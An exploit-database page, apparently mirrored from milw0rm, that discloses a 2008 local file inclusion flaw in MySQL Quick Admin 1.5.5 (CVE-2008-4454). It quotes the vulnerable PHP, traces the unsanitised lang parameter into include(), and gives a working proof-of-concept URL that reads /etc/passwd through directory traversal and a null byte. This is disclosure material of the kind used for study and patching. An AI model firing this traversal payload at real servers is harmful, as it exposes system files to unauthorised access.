Skip to content
cyberexploits
webappphptext

MySQL Quick Admin 1.5.5 - Local File Inclusion

MySQL Quick Admin 1.5.5 - Local File Inclusion

Published on 2008-11-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/7020.txt7eac4c3a
raw
##################################################################################

#										 #		

#		Author:	Vinod Sharma						 #

#		Email:	vinodsharma.mimit@gmail.com				 #

#		Date:	05th Nov, 2008						 #

#		Note: 	This information is only for educational purpose, author # 

#			will not bear responsibility for any damages. 		 #

##################################################################################





#########################################################################################

#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 				#

#allows remote attackers to read and execute arbitrary files via a .. (dot dot) 	#

#in the lang parameter to actions.php.							#

#											#

#											#

#											#

#Appplication still unpatched								#

#											#

#vulnerable code in actions.php								#

# 											#				

#/* code start										#

#    case 27:										#

#         $do = $_GET['do'];								#

#         if($do == "theme" && file_exists("themes/".$_GET['theme'])){			#

#             setcookie('theme', $_GET['theme'], time()+60*60*24*30);			#

#             $_SESSION['theme'] = $_GET['theme'];					#

#             unset($_SESSION['theme_name']);						#

#         } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){		#

#             setcookie('language', $_GET['lang'], time()+60*60*24*30);			#

#             $_SESSION['language'] = $_GET['lang'];					#

#             unset($_SESSION['lang_name']);						#

#         }										#

#         header("Location: main.php");							#

#											#

#/* code end										#

#											#	

#$_SESSION['language'] is set to the value of the lang parameter without any 		#

#sanitization.										#

#											#

#The actions.php will send this $_SESSION['language'] value to required.php which will 	#

#pass it to include() function without any sanitization. 				#

#											#

#											#

#vulnerable code in required.php							#

#											#

#/* code start 										#

#											#

#line 22 in required.php:  include("lang/".$_SESSION['language']."/lang.php");		#			

#											#

#/* code end										#

#########################################################################################





POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00





#########################################################################################

#	references:									#

#	http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454			#

#	http://secunia.com/advisories/31820						#

#########################################################################################



# milw0rm.com [2008-11-06]

View on GitHub